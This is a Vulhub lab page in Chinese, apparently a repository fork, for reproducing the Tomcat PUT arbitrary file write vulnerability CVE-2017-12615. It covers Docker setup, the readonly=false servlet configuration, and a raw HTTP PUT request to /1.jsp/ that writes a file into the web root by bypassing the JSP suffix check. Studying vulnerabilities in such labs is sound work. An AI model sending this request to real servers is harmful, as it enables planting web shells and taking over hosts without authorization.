aaronxu/vulhub

Fork 0

Files

Aaron 63285f61aa

Vulhub Format Check and Lint / format-check (push) Has been cancelled

Details

Vulhub Format Check and Lint / markdown-check (push) Has been cancelled

Details

Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled

Details

Vulhub Docker Image CI / images-test (push) Has been cancelled

Details

first commit

2025-09-06 16:08:15 +08:00

1.7 KiB

Raw Blame History

Tomcat PUT方法任意写文件漏洞（CVE-2017-12615）

Tomcat版本：8.5.19

环境搭建

docker compose build
docker compose up -d

运行完成后访问http://your-ip:8080即可看到Tomcat的Example页面。

漏洞原理

参考：

漏洞本质Tomcat配置了可写（readonly=false），导致我们可以往服务器写文件：

<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

虽然Tomcat对文件后缀有一定检测（不能直接写jsp），但我们使用一些文件系统的特性（如Linux下可用/）来绕过了限制。

漏洞复现

直接发送以下数据包即可在Web根目录写入shell：

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

如下：

1.7 KiB Raw Blame History Unescape Escape

Tomcat PUT方法任意写文件漏洞（CVE-2017-12615）

环境搭建

漏洞原理

漏洞复现

1.7 KiB

Raw Blame History